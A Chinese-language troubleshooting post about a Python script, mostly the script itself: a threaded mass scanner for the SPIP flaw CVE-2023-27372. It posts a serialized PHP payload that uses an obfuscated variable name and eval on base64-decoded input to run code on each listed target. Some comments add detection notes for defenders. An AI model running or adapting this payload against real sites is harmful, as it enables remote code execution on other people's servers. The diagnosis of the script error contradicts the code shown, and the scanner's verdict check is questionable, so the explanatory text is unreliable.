脚本报错: line 38 +;$b = $$aa;evalsubstrnbase64_decode$b1;;&nobotimport argparseimport requestsfrom bs4 import BeautifulSoupimport urllibparsefrom concurrentfutures import ThreadPoolExecutorimport mult
在第38行,代码中使用了一个变量args.url,但是在该行之前没有定义args变量。这可能是因为在导入argparse模块之前使用了args.url。要解决这个问题,可以将导入argparse模块的位置移动到脚本的开头。需要注意:在下面列出的代码中,args 是在 main() 内由 parser.parse_args() 赋值之后才被使用的,因此这一诊断应对照实际的报错信息再确认。修改后的代码如下:
import argparse
import requests
from bs4 import BeautifulSoup
import urllib.parse
from concurrent.futures import ThreadPoolExecutor
import multiprocessing
def main() -> None:
    """Parse the command line and run check_vulnerability on one URL or a list.

    With -u/--url the single result string is printed. With -t/--txt the
    non-empty lines of the file are submitted to a thread pool and one entry
    per URL is written to CVE-2023-27372-result.txt in the working directory.

    check_vulnerability issues a GET and then a POST carrying a PHP snippet
    to each URL, so every run is an active probe that appears in the target's
    web-server logs rather than a passive version check.
    """
    # Parse the command-line arguments
    parser = argparse.ArgumentParser(description="Send POST request and check for vulnerability")
    parser.add_argument("-u", "--url", type=str, help="URL of the target")
    parser.add_argument("-t", "--txt", type=str, help="Path to the text file containing URLs")
    args = parser.parse_args()
    # Require at least one of -u/--url or -t/--txt
    if not args.url and not args.txt:
        print("Please provide a URL using the -u or --url option, or a text file using the -t or --txt option.")
        # exit() with no argument ends the process with status 0, so a wrapper
        # script cannot tell this usage error from a successful run.
        exit()
    # Single-URL mode: run the check inline and print its verdict
    if args.url:
        result = check_vulnerability(args.url)
        print(result)
    # Batch mode: the text file holds one URL per line
    if args.txt:
        # No encoding is given, so the platform default is used to decode the file.
        with open(args.txt, 'r') as file:
            urls = file.readlines()
            # Trim whitespace and drop blank lines
            urls = [url.strip() for url in urls if url.strip()]
        num_urls = len(urls)
        current_url = 0
        # Size the pool from the URL count, capped at twice the CPU count.
        # NOTE(review): a file with no usable lines makes this 0, which
        # ThreadPoolExecutor rejects with ValueError.
        num_threads = min(num_urls, multiprocessing.cpu_count() * 2)
        results = []
        with ThreadPoolExecutor(max_workers=num_threads) as executor:
            for url in urls:
                current_url += 1
                # Progress is printed when the job is queued, not when it runs.
                print(f"正在处理 URL: {url.strip()} [{current_url}/{num_urls}]")
                # submit() returns a Future; they are kept in input order.
                result = executor.submit(check_vulnerability, url.strip())
                results.append(result)
        # Fixed file name, opened with "w": each run overwrites the previous
        # report. The name is also a recognisable artefact of this script on disk.
        output_file = "CVE-2023-27372-result.txt"
        with open(output_file, "w") as file:
            for url, result in zip(urls, results):
                file.write(f"{url.strip()}:\n")
                # The executor block above has already waited for every job.
                # result() re-raises whatever the worker raised, so a single
                # failed request stops the report part-way through.
                file.write(f"  {result.result()}\n")
        print(f"结果已保存至 {output_file}")
# Function used to check a URL for the vulnerability
def check_vulnerability(url: str) -> str:
    """Probe one site for CVE-2023-27372 and return a Chinese verdict string.

    The function fetches spip.php?page=spip_pass under `url`, reads the hidden
    `formulaire_action_args` form token from the returned HTML, and posts the
    form back with the `oubli` field set to PHP serialized-string syntax that
    wraps a PHP snippet. The site is reported as vulnerable only when the
    reply has status 200 and its body contains both 'oubli' and 'phpinfo()'.

    Detection notes for defenders reading this listing: the observable is a
    POST to the spip_pass page whose `oubli` value starts with `s:` and
    contains a `<?php` tag, where a legitimate submission would carry an
    e-mail address. The User-Agent is a fixed browser string and is therefore
    not a useful discriminator.

    Raises:
        AttributeError: when the fetched page has no `formulaire_action_args`
            input (soup.find returns None).
        requests.RequestException: propagated unchanged from either request.
    """
    parsed_url = urllib.parse.urlparse(url)
    # Make sure the base URL ends with '/', so urljoin appends instead of
    # replacing the last path segment
    if not parsed_url.path.endswith('/'):
        url += '/'
    request_url = urllib.parse.urljoin(url, 'spip.php?page=spip_pass')
    # Step 1: fetch the form to obtain its per-form token
    response = requests.get(request_url)
    soup = BeautifulSoup(response.text, "html.parser")
    formulaire_action_args_input = soup.find("input", {"name": "formulaire_action_args"})
    # NOTE(review): no None check; a page without this input fails here.
    formulaire_action_args_value = formulaire_action_args_input.get("value")
    # Percent-encode every reserved character, because the body below is
    # assembled by hand rather than passed as a dict
    formulaire_action_args_value_encoded = urllib.parse.quote(formulaire_action_args_value, safe='')
    # Browser-like headers; Host is set explicitly from the parsed URL
    headers = {
        "Host": parsed_url.netloc,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Step 2: hand-built form body. The embedded PHP builds a variable name by
    # XOR-ing two string literals and passes base64-decoded data to eval(), so
    # log or WAF signatures that look only for plain superglobal names will
    # not match it; match on the serialized-string prefix and the PHP tag.
    data = f'page=spip_pass&formulaire_action=oubli&formulaire_action_args={formulaire_action_args_value_encoded}&oubli=s:19:"<?php $a = "~+d()"^"!{+{}";$b = ${$a}[a];@eval(substr("n".base64_decode($b),1));?>";&nobot='
    response = requests.post(request_url, headers=headers, data=data)
    # Verdict is a plain substring match on the reply body. Treat a
    # "not vulnerable" result as inconclusive and confirm patch state from the
    # installed SPIP version against the vendor advisory for this CVE.
    if response.status_code == 200 and 'oubli' in response.text and 'phpinfo()' in response.text:
        return f"存在CVE-2023-27372漏洞"
    else:
        return f"不存在CVE-2023-27372漏洞"
# Run the CLI only when the file is executed as a script, not when imported
if __name__ == "__main__":
    main()